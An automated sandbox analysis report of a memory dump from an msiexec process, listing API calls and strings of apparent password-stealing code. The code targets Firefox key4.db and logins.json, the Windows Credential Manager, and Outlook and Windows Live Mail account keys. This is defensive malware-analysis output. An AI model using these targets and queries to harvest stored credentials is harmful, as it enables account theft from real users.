                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                      • API String ID: 633282248-1996832678
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00406782
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                      • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                      • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                      • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                      • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                      • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                      Strings
                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                      • key4.db, xrefs: 00406756
                                                                                                      • , xrefs: 00406834
                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp$memsetstrlen
                                                                                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A973
                                                                                                      • memset.MSVCRT ref: 0040A996
                                                                                                      • memset.MSVCRT ref: 0040A9AC
                                                                                                      • memset.MSVCRT ref: 0040A9BC
                                                                                                      • sprintf.MSVCRT ref: 0040A9F0
                                                                                                      • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                      • sprintf.MSVCRT ref: 0040AABE
                                                                                                      • _mbscat.MSVCRT ref: 0040AAED
                                                                                                        • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                      • sprintf.MSVCRT ref: 0040AB21
                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                      Similarity
                                                                                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                      APIs
                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                      Similarity
                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                      • String ID: salu
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • strlen.MSVCRT ref: 00443AD2
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                                      • memset.MSVCRT ref: 00443B2E
                                                                                                      • memset.MSVCRT ref: 00443B4B
                                                                                                      • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                      • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                        • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpymemset$??2@??3@AddressByteCharFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                      • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail$`{/h
                                                                                                      APIs
                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                      APIs
                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                      • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                      • memset.MSVCRT ref: 004097BD
                                                                                                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                      APIs
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                      • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                      • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                      • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                        • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                        • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                        • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                      • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                      • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                      • SetFocus.USER32(?), ref: 0040CB92
                                                                                                      • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                      APIs
                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                      • memset.MSVCRT ref: 00410171
                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                      • String ID: \systemroot
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                      • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE$`{/h
                                                                                                      APIs
                                                                                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                      Strings
                                                                                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                      Similarity
                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                      APIs
                                                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$strlen
                                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00402C9D
                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                      • memset.MSVCRT ref: 00402CF7
                                                                                                      • sprintf.MSVCRT ref: 00402D10
                                                                                                      • sprintf.MSVCRT ref: 00402D4E
                                                                                                        • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset$sprintf$Enum
                                                                                                      • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username$`{/h
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: free$strlen
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                      • String ID: $`{/h
                                                                                                      APIs
                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F84A
                                                                                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                      • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                      • String ID: Creds$`{/h$ps:password
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                      • String ID: %s@yahoo.com
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • too many attached databases - max %d, xrefs: 0042E951
                                                                                                      • database is already attached, xrefs: 0042EA97
                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                      • out of memory, xrefs: 0042EBEF
                                                                                                      • database %s is already in use, xrefs: 0042E9CE
                                                                                                      • unable to open database: %s, xrefs: 0042EBD6
                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
